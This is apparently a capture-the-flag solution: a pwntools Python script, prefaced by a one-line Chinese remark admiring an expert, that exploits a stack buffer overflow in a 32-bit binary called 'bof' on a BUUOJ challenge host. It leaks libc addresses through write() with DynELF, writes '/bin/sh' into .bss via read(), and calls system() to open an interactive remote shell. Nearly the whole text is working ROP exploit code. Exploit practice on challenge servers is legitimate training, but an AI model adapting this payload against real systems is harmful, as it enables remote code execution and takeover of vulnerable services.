仰望一下大佬
from pwn import * r=remote('node3.buuoj.cn',29989) elf=ELF('./bof') read_addr=elf.symbols['read'] write_addr=elf.symbols['write'] main_addr=0x804851c bss_addr=elf.symbols['__bss_start'] def leak(addr): r.recvline() payload='a'*0x6c+'b'*0x4+p32(write_addr)+p32(main_addr)+p32(1)+p32(addr)+p32(0x4) r.sendline(payload) leak_addr=r.recv(4) return leak_addr d=DynELF(leak,elf=ELF('./bof')) system_addr=d.lookup('system','libc') payload='a'*0x6c+'b'*0x4+p32(read_addr)+p32(main_addr)+p32(0x0)+p32(bss_addr)+p32(0x8) r.sendline(payload) r.sendline('/bin/sh') payload='a'*0x6c+'b'*0x4+p32(system_addr)+p32(main_addr)+p32(bss_addr) r.sendline(payload) r.interactive()